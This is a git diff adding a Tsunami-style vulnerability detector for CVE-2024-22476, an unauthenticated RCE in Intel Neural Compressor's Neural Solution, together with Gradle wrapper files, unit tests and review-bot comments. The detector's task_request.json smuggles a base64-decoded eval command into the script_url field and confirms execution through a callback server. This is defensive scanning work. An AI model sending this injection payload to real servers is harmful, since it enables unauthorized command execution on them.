+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle b/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle new file mode 100644 index 000000000..6e7a65fa8 --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/settings.gradle @@ -0,0 +1,10 @@ +/* + * This file was generated by the Gradle 'init' task. + * + * The settings file is used to specify which projects to include in your build. + * + * Detailed information about configuring a multi-project build in Gradle can be found + * in the user manual at https://docs.gradle.org/6.5/userguide/multi_project_builds.html + */ + +rootProject.name = 'CVE-2024-22476' 
diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java
new file mode 100644
index 000000000..ead69a8ed
--- /dev/null
+++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476DetectorBootstrapModule.java
@@ -0,0 +1,27 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.google.tsunami.plugins.detectors.cves.cve202422476;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** An CVE-2024-22476 Guice module that bootstraps the {@link Cve202422476VulnDetector}. */
+public class Cve202422476DetectorBootstrapModule extends PluginBootstrapModule {
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(Cve202422476VulnDetector.class);
+ }
+}
diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java
new file mode 100644
index 000000000..19a703209
--- /dev/null
+++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetector.java
@@ -0,0 +1,220 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202422476; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.common.net.HttpHeaders.CONTENT_TYPE; +import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority; +import static com.google.tsunami.common.net.http.HttpRequest.post; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.io.BaseEncoding; +import com.google.common.io.Resources; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import 
com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects the CVE-2024-22476 vulnerability. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2024-22476 Detector", + version = "0.1", + description = "Checks for occurrences of CVE-2024-22476 in Intel Neural Compressor instances.", + author = "frkngksl", + bootstrapModule = Cve202422476DetectorBootstrapModule.class) +@ForWebService +public final class Cve202422476VulnDetector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final PayloadGenerator payloadGenerator; + + private static final String VUL_PATH = "task/submit/"; + private static final Duration BATCH_REQUEST_WAIT_AFTER_TIMEOUT = Duration.ofSeconds(10); + private final String taskRequestTemplate; + private final HttpClient httpClient; + + @Inject + Cve202422476VulnDetector( + @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) + throws IOException { + this.utcClock = checkNotNull(utcClock); + this.httpClient = + checkNotNull(httpClient, "HttpClient cannot be null.") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "PayloadGenerator cannot be null."); + taskRequestTemplate = + 
Resources.toString(Resources.getResource(this.getClass(), "task_request.json"), UTF_8); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isWebServiceOrUnknownService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean checkNeuralSolutionFingerprint(NetworkService networkService) { + String targetWebAddress = buildTarget(networkService).toString(); + var request = HttpRequest.get(targetWebAddress).withEmptyHeaders().build(); + + try { + HttpResponse response = httpClient.send(request, networkService); + return response.status().isSuccess() + && response + .bodyString() + .map(body -> body.contains("{\"message\":\"Welcome to Neural Solution!\"}")) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private boolean isWebServiceOrUnknownService(NetworkService networkService) { + return NetworkServiceUtils.isWebService(networkService) + && checkNeuralSolutionFingerprint(networkService); + } + + private static StringBuilder buildTarget(NetworkService networkService) { + StringBuilder targetUrlBuilder = new StringBuilder(); + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + targetUrlBuilder + .append("https://") + .append(toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + return targetUrlBuilder; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + Payload payload = generateCallbackServerPayload(); + if (!payload.getPayloadAttributes().getUsesCallbackServer()) { + logger.atInfo().log( + "The Tsunami callback server is not setup 
for this environment, so we cannot confirm the" + + " RCE callback"); + return false; + } + String taskRequestBody = taskRequestTemplate; + // Check callback server is enabled + logger.atInfo().log("Callback server is available!"); + taskRequestBody = + taskRequestBody.replace( + "{{CALLBACK_PAYLOAD}}", + BaseEncoding.base64().encode(payload.getPayload().getBytes(UTF_8))); + String targetVulnerabilityUrl = buildTarget(networkService).append(VUL_PATH).toString(); + logger.atInfo().log("Payload: %s", payload.getPayload().getBytes(UTF_8)); + try { + HttpResponse httpResponse = + httpClient.send( + post(targetVulnerabilityUrl) + .setHeaders( + HttpHeaders.builder().addHeader(CONTENT_TYPE, "application/json").build()) + .setRequestBody(ByteString.copyFromUtf8(taskRequestBody)) + .build(), + networkService); + logger.atInfo().log("Callback Server Payload Response: %s", httpResponse.bodyString().get()); + Uninterruptibles.sleepUninterruptibly(BATCH_REQUEST_WAIT_AFTER_TIMEOUT); + return payload.checkIfExecuted(); + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request."); + return false; + } + } + + private Payload generateCallbackServerPayload() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) + .setExecutionEnvironment( + PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) + .build(); + + return this.payloadGenerator.generate(config); + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + 
.setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_22476")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-22476 Intel Neural Compressor RCE") + .setDescription( + "The Intel Neural Compressor has a component called Neural Solution that brings" + + " the capabilities of Intel Neural Compressor as a service. The" + + " task/submit API in the Neural Solution webserver is vulnerable to an" + + " unauthenticated remote code execution (RCE) attack. The" + + " script_urlparameter in the body of the POST request for this API is not" + + " validated or filtered on the backend. As a result, attackers can" + + " manipulate this parameter to remotely execute arbitrary commands.") + .setRecommendation( + "You can upgrade your Intel Neural Compressor instances to 2.5.0 or later.")) + .build(); + } +} diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json new file mode 100644 index 000000000..0eb8db38e --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/main/resources/com/google/tsunami/plugins/detectors/cves/cve202422476/task_request.json @@ -0,0 +1,10 @@ +{ + "script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo {{CALLBACK_PAYLOAD}} | base64 --decode)\"", + "optimized": "False", + "arguments": [ + "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result" + ], + "approach": "static", + "requirements": [], + "workers": 1 +} 
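Review bot: In `isServiceVulnerable`, the response logging calls `httpResponse.bodyString().get()`, which throws `NoSuchElementException` on an empty body, and the enclosing `try` catches only `IOException`, so the exception would leave the stream in `detect` instead of yielding `false`; use `httpResponse.bodyString().orElse("")`. Two lines above, `logger.atInfo().log("Payload: %s", payload.getPayload().getBytes(UTF_8))` formats a `byte[]` and so logs an array reference rather than the payload; pass `payload.getPayload()`. The 10-second `sleepUninterruptibly` also runs when the POST was rejected, so returning `false` on `!httpResponse.status().isSuccess()` before the wait would keep scans of patched targets short, assuming a vulnerable server always answers with a success status as the test mock does. In `buildDetectionReport`, `script_urlparameter` is missing a space.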
diff --git a/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java b/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java new file mode 100644 index 000000000..0ad5aa8ca --- /dev/null +++ b/community/detectors/intel_neural_compressor_cve_2024_22476/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202422476/Cve202422476VulnDetectorTest.java 
@@ -0,0 +1,180 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.cves.cve202422476; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import 
okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202422476VulnDetector}. */ +@RunWith(JUnit4.class) +public class Cve202422476VulnDetectorTest { + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z")); + private MockWebServer mockWebServer; + private MockWebServer mockCallbackServer; + private NetworkService targetNetworkService; + private TargetInfo targetInfo; + + @Inject private Cve202422476VulnDetector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockCallbackServer = new MockWebServer(); + mockCallbackServer.start(); + + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + FakePayloadGeneratorModule.builder().setCallbackServer(mockCallbackServer).build(), + new Cve202422476DetectorBootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + mockCallbackServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws IOException { + // It is a blind RCE, body is not important. This is a part of a valid response. 
+ startMockWebServer(true); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(targetNetworkService) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2024_22476")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2024-22476 Intel Neural Compressor RCE") + .setRecommendation( + "You can upgrade your Intel Neural Compressor instances to 2.5.0 or" + + " later.") + .setDescription( + "The Intel Neural Compressor has a component called Neural Solution" + + " that brings the capabilities of Intel Neural Compressor as a" + + " service. The task/submit API in the Neural Solution webserver" + + " is vulnerable to an unauthenticated remote code execution (RCE)" + + " attack. The script_urlparameter in the body of the POST request" + + " for this API is not validated or filtered on the backend. 
As a" + + " result, attackers can manipulate this parameter to remotely" + + " execute arbitrary commands.")) + .build()); + assertThat(mockWebServer.getRequestCount()).isEqualTo(2); + assertThat(mockCallbackServer.getRequestCount()).isEqualTo(1); + } + + @Test + public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException { + startMockWebServer(false); + + DetectionReportList detectionReports = + detector.detect(targetInfo, ImmutableList.of(targetNetworkService)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + assertThat(mockWebServer.getRequestCount()).isEqualTo(2); + } + + private void startMockWebServer(boolean isVulnerableServer) throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + + @Override + public MockResponse dispatch(RecordedRequest request) { + switch (request.getPath()) { + case "/": + return new MockResponse() + .setResponseCode(200) + .setBody("{\"message\":\"Welcome to Neural Solution!\"}"); + case "/task/submit/": + if (isVulnerableServer) { + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"status\":\"successfully\",\"task_id\":\"065d95dd70524cb2baa743def3ff7036\",\"msg\":\"Task" + + " submitted successfully\"}"); + } else { + return new MockResponse() + .setResponseCode(422) + .setBody("{\"detail\":\"Invalid task\"}"); + } + default: + return new MockResponse() + .setResponseCode(404) + .setBody("{\"detail\":\"Not Found\"}"); + } + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .addSupportedHttpMethods("POST") + .addSupportedHttpMethods("GET") + .build(); + targetInfo = + TargetInfo.newBuilder() + .addNetworkEndpoints(targetNetworkService.getNetworkEndpoint()) + .build(); + } +} 
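Review bot: `detect_ifNotVulnerable_doesNotReportVuln` never enqueues a response on `mockCallbackServer`, so the empty result depends on how the unanswered callback lookup fails rather than on an explicit negative answer; enqueue `PayloadTestHelper.generateMockUnsuccessfulCallbackResponse()` before calling `detect`. There is also no case for a target whose `/` does not return the Neural Solution banner, which should assert that `mockWebServer.getRequestCount()` is 1 and that no POST to `/task/submit/` was made. Both tests go through the detector's real 10-second wait, and the expected description repeats the `script_urlparameter` typo, so it has to change together with the detector.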
diff --git a/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties b/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/jira_cve_2022_0540/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/community/detectors/jira_cve_2022_0540/gradlew b/community/detectors/jira_cve_2022_0540/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/jira_cve_2022_0540/gradlew +++ b/community/detectors/jira_cve_2022_0540/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
